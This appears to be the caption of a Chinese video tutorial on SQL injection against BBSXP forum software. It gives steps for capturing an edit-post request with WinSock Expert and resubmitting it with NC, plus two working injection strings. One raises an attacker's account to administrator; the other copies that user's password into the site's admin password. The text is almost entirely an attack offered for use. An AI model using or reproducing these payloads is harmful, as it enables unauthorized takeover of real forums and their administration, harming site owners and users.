| 动画介绍:使用WinSock Expert 抓包的时候记得修改WSockExpert.ini文件里面的参数,默认是100,改成65500就可以了,要不抓到的ID编号1和2数据包,会被后面的数据顶没的(主要就是要1和2的数据)
下面是注射语句
1、注册 2、发帖子 3、点编辑 4、到这步的时候就开抓包工具WinSock Expert选中你要监听的网页.然后随便把你的帖子改一下点发表. 5、修改抓到的数据利用NC提交(具体操作看动画)
提升为管理员
’,’’,’’,’修改帖子成功’);update bbsxp_users set UserRoleID=1 where username=’lst’--
设后台管理
’,’’,’’,’修改帖子成功’);update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username=’lst’)-- |